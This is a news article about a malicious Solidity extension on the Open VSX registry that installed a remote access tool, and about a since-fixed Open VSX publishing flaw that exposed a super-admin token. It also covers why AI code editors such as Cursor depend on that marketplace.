Hackers are exploiting a dangerous loophole to target vibe coders. Cursor, Windsurf, and other AI-powered code editors can’t access the VS Code Marketplace and instead rely on riskier third-party platforms, where malicious extensions and critical flaws thrive.
Secure Annex researcher John Tuckner found a malicious extension that developers have downloaded 200,000 times. The extension targets Solidity developers, who use this programming language to implement smart contracts on ethereum and other blockchains.
Instead of any useful features, the extension runs PowerShell scripts, giving attackers remote access to the infected computer.
“It doesn't even do anything meaningful for the user and just installs the remote access tool,” the researcher said in a blog post.
Tuckner warns vibe coders that the platforms they use currently lack basic security scanning and curation.
“No rocket science PhD was needed to analyze this extension. These extensions should have absolutely been caught by even basic security scanning and should not be available in the marketplace. If these aren't being caught, what hope is there for anything even slightly more sophisticated?” the researcher argues.
The malware was discovered on the Open VSX registry, a third-party marketplace that has grown significantly in popularity with the rise of AI code editors.
“Most of our favorite vibe editors are using Open VSX,” the researcher noted.
Used by over 8 million developers, Open VSX provides vibe coders access to extensions they couldn’t otherwise get.
Vibe coders can’t use Microsoft’s Visual Studio Marketplace for Cursor
Due to legal nuances, alternative code editors built on the open-source VS Code project are barred from accessing the official Microsoft Visual Studio Marketplace, which is a go-to source for VS Code developers. This marketplace is locked to Microsoft’s products only.
“Which means editors like Cursor, Windsurf, and other VS Code forks are defaulting to other marketplaces because of this,” Tuckner explains.
The restrictions leave alternative editors with tough choices when offering extensions to users.
Open VSX emerged as an alternative marketplace without Microsoft’s restrictions, providing a lifeline for vibe coders. Here, anyone can publish extensions or download them without strings attached. But, inevitably, hackers try to exploit this.
The researcher warns that openness introduces risks not present in Microsoft’s more curated marketplace.
“While Microsoft's marketplace has its own issues, it benefits from corporate oversight, automated scanning, and review processes that help catch malicious extensions before they reach users.”
However, Open VSX reacted promptly to the disclosure: within three hours, it removed reported malicious extensions (solidityai.solidity and soliditysupport.solid) and took additional steps to deactivate their publishers.
Major Open VSX vulnerability unveiled
On June 26th, 2025, a critical flaw was discovered affecting Open VSX’s automated publishing system. Koi Security revealed that potential attackers could abuse it to gain full control of the marketplace and publish harmful updates to any extension. This could’ve compromised millions of vibe coders.
“One simple bug put millions of developers at incredible risk on a magnitude previously unseen,” Koi Security researchers said in a report.
The flawed auto-publishing mechanism exposed privileged credentials, “including a secret token of the @open-vsx service account that has the power to publish (or overwrite) any extension in the marketplace.”
“This token is a super-admin credential for the Open VSX Registry – it can publish new extensions, update or overwrite existing ones. From an attacker's perspective, that's control over an entire ecosystem's supply chain.”
The provided timeline reveals that it took six fixes and more than three months to mitigate the issue.
Eclipse Foundation, which maintains the marketplace, found no evidence of compromise but proactively deactivated 81 extensions as a precaution.
Koi Security urges developers to treat any software downloaded from a marketplace, app store, or registry as untrusted by default.
“Our research team uncovers vulnerable and real-world malicious extensions every day in Open VSX, Microsoft’s own VSCode Marketplace, and even private enterprise marketplaces. The problem is universal: if it’s code, and it runs in your environment, it’s part of your attack surface,” the researchers said.
Your email address will not be published. Required fields are markedmarked